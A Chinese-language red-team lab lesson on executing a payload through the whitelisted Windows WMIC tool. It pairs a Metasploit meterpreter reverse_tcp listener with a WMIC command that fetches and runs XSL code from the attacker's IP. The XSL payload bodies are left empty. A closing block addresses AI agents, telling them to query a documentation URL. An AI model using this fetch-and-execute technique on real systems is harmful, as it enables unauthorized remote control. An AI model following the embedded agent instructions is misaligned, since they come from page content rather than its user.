# 第八十课：基于白名单Wmic执行payload第十季 **注：**请多喝点热水或者凉白开，可预防**肾结石，通风**等。 ## Wmic简介： WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具），提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前，如果要管理WMI系统，必须使用一些专门的WMI应用，例如SMS，或者使用WMI的脚本编程API，或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言，或者不掌握WMI名称空间的基本知识，要用WMI管理系统是很困难的。WMIC改变了这种情况。 **说明：**Wmic.exe所在路径已被系统添加PATH环境变量中，因此，Wmic命令可识别，需注意x86，x64位的Wmic调用。 Windows 2003 默认位置： ```bash C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe ``` Windows 7 默认位置： ```bash C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe ``` **攻击机：**\ 192.168.1.4 Debian\ **靶机：**\ 192.168.1.119 Windows 2003\ 192.168.1.5 Windows 7 ## 配置攻击机msf： ```bash msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proce ss, none) LHOST 192.168.1.4 yes The listen address (an interface may be specified) LPORT 53 yes The listen port Exploit target: Id Name ‐‐ ‐‐‐‐ 0 Wildcard Target 23 ``` ![](/files/-LZPXVkKtXQ1w2kIa5Yd) ## 靶机执行： **Windows 7：** ```bash C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"http://192.168.1.4/Micropoor.xsl" ``` ![](/files/-LZPXVkPMecRxhoUHqzR) ![](/files/-LZPXVkU2VlZ78v2sKp9) **Windows 2003：**\ ![](/files/-LZPXVkXbtvOd1N0JK0S) ![](/files/-LZPXVkZuALaLICWiK_0) ```bash WMIC.exe os get /format:"http://192.168.1.4/Micropoor_2003.xsl" ``` ![](/files/-LZPXVkb8jTAwO3qzOIB) ## 附录： **Micropoor\_Win7.xsl：** ```javascript ``` **Micropoor\_2003.xsl:** ```markup ``` > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/71-80/80-ji-yu-bai-ming-dan-wmic-zhi-hang-payload-di-shi-ji.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.